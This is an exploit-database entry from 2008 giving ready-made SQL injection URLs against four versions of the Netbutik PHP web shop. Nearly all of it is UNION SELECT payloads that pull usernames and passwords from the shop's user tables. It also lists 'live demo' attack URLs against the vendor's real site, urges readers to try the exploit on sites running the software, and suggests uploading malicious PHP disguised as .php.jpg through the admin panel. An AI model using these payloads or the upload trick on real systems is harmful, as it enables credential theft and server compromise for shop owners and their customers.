Netbutikker 4 - SQL Injection

EDB-ID:

5665


Author:

Mr.SQL

Type:

webapps


Platform:

PHP

Date:

2008-05-21


#############   Viva Islam   ####################
# rEm0te SQL Injection Vulnerability 
#                                       
# netbutik ( V1 ) (( index.php id ))
#                                       
#########################################

## Script Name : Netbutik 

## Download : www.simpelside.dk

## Version : version [ 1 , 2 , 3 ,4 ]

#########################################

## AuTh0r : Mr.SQL

## H0ME  : WwW.PaL-HaCkEr.CoM

## Email  :  SQL@Hotmail.it

###################################################################################

## Note ## This script have (4) version on demo and users table have diffrents names you can see that in exploits
For using exploit on sites which using software plz use your mind to have good results.
  

##  (()) -(:: SQL ::)- (())

version number [1]
                  1  =====>> http://www.target.dk/netbutik1/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik1_brugere/*
                  2  =====>> http://www.target.dk/netbutik1/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik1_brugere/*


version number [2]
                  1 ======>>http://www.target.dk/netbutik2/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik2_brugere/*
                  2 ======>>http://www.target.dk/netbutik2/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik2_brugere/*	
		
  
version number [3]
                  1 ======>>http://www.target.dk/netbutik3/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik3_brugere/*
                  2 ======>>http://www.target.dk/netbutik3/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik3_brugere/*


version number [4]
                  1 ======>>http://www.target.dk/netbutik4/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik4_brugere/*
                  2 ======>>http://www.target.dk/netbutik4/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere/*			
	
			  
(#####) must be using all test all exploits for know any version runing on target site 				  


##  .::. liVe DeMO .::.


##  http://www.simpelside.dk/netbutik1/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik1_brugere/*

##  http://www.simpelside.dk/netbutik2/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik2_brugere/*

##  http://www.simpelside.dk/netbutik3/product.php?id=-1+union+select+1,2,brugernavn,adgangskode,5,6,7,8,9+from+netbutik3_brugere/*

##  http://www.simpelside.dk/netbutik4/netbutik.php?cat=-1+union+select+concat_ws(0x3a3a,brugernavn,adgangskode)+from+netbutik4_brugere/*


###################################################################################


  #######################################
## Note:: YOU can upload your Ev!l code  ADMIN CP  (( .php.jpg ))
## Fr0m /admin/admin_edit_products.php                                              
  #######################################


###################################################################################
###################################################################################

<< Gr33Tz>>  (( HaCkEr-EGy )) :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: (( MuslimS HaCkErS ))

###################################################################################
###################################################################################
                                                                            -(:::: Geek Inj3cT0r ::::)-

# milw0rm.com [2008-05-21]